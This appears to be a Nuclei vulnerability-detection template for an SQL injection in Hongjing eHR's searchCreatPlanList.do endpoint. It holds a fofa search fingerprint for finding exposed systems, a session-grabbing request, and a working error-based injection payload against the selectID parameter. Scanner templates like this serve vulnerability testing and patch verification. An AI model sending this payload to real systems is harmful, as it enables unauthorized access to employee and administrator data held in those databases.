id: hongjingeHR-searchCreatPlanList_do-sql

info:
  name: 宏景eHR searchCreatPlanList.do SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: app="HJSOFT-HCM"
    宏景eHR searchCreatPlanList.do 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s/7co9K8ufUll-x1YNBsZOXA
  tags: sql injection

http:
  - raw:
      - |
        GET /templates/index/getpassword.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
    extractors:
      - type: regex
        part: header
        name: JSESSIONID
        group: 1
        regex:
          - 'JSESSIONID=(.*?);'
        internal: true
  - raw:
      - |
        GET /train/plan/searchCreatPlanList.do?b_selectPlan=query&selectID=1'%2B(1-@@VERSION)%2B')--+ HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{JSESSIONID}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '转换成数据类型 int 时失败'
          - '在将 nvarchar 值'
        condition: and
      - type: status
        status: 
          - 200